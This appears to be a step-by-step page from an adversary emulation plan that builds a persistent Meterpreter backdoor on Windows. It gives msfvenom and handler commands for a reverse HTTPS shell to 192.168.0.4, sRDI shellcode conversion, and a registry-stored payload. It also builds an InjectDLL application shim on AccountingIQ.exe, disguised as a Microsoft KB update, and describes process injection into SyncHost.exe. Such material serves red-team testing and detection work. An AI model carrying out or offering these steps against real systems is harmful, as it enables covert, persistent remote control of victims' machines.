#
Step 19 File Descriptions, Role in Emulation, and Execution Flow
#
bin329.tmp
bin329.tmp
is a 32bit sRDI converted meterpreter dll.
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=53 -f dll -o payload.dll
git clone https://github.com/monoxgas/sRDI
python3 sRDI/Python/ConvertToShellcode.py payload.dll
mv payload.bin bin329.tmp
From
sudo msfconsole
handler -p windows/meterpreter/reverse_https -H 192.168.0.4 -P 53
This payload will be stored in the registry at HKLM\SOFTWARE\Microsoft\DRM\4
as a binary value by prep_and_install_shim.ps1
#
prep_and_install_shim.ps1
Launch from an interactive administrator PowerShell, prep_and_install_shim.ps1 stores bin329.tmp into the registry, copies over files to C:\Windows\Temp
, and installs the applicatin shim via sdbinst.exe
.
#
dll329.dll
dll329.dll
is a custom statically compiled dll that is injected into the AccountingIQ.exe
application via the InjectDLL application shim when the application is launched. Its purpose is to spawn a donor process(SyncHost.exe), inject into it, read the payload registry key, and execute the payload.
Code for this dll can be found in injectDLL-Shim
Simply click the .sln
file to open with Visual Studio Code 2019. Then compile.
#
sdbE376.tmp
sdbE376.tmp
is the application shim database file. It contains the information on which to process to appy what shim to with which parameters. For this technique we are targeting AccountingIQ.exe
with an InjectDLL
shim with a parameter of C:\Windows\Temp\dll329.tmp
.
#
Generating an sdb file from scratch
Download the Windows Assessment and Deployment Kit for Windows 10. You only need to select the Application Compatibility Toolkit
during installation.
From an Administrator PowerShell/CMD shell
cd "C:\Program Files (x86)\Windows Kits\10\Assessment and Deployment Kit\Application Compatibility Toolkit\Compatibility Administrator (32-bit)"
.\Compatadmin.exe /x
/x
is an undocumented argument that will enable more shims
Click
Fix
to beginAccountingIQ
for name of programMicrosoft
for name of vendor- Browse to program you would like to shim (AccountingIQ.exe)
Click
Next
to skip the Compatability Mode sectionSelect the
InjectDLL
shim by checking the box to its left- Click
Parameters
- Under
Command line
put the path to the DLL to inject -C:\Windows\Temp\dll329.dll
OK
Next
- Click
Unselect all check boxes so that the shim will fire on any application that shares the name
AccountingIQ.exe
Finish
Save Database as
Microsoft KB2832077
- Following CTISave the SDB file to
C:\Windows\Temp\sdbE376.sdb
-sdbE376.tmp
Open PowerShell
mv C:\Windows\Temp\sdbE376.sdb C:\Windows\Temp\sdbE376.tmp
sdbinst.exe C:\Windows\Temp\sdbE376.tmp
The shim is now installed
#
Execution Flow
Encoded PowerShell
- Drops
sdbE376.tmp
anddll329.dll
toC:\Windows\Temp
- Sets Reg key with binary data of meterpreter payload to
HKLM:\Software\Microsoft\DRM\4
- Invokes
sdbinst.exe
onsdbE376.tmp
- Installs shim
- Drops
Box is rebooted
Login over RDP onto system
Shim fires on launch of
AccountingIQ.exe
at logindll329.dll
is injected intoAccountingIQ.exe
via InjectDLL shimdll329.dll
spawnsC:\Windows\SysWOW64\SyncHost.exe
as a donor processdll329.dll
injects and maps a function intoSyncHost.exe
- Function runing in
SyncHost.exe
now reads payload fromHKLM:\Software\Microsoft\DRM\4
and executes it
User level meterpreter session is spawned
#
Process Tree of Execution
#
Uninstallation
Removing the shim can be done in two ways:
sdbinst.exe -u sdbE376.tmp
Open
Control Panel\Programs\Programs and Features
and look for theMicrosoft KB2832077
database name and uninstall it.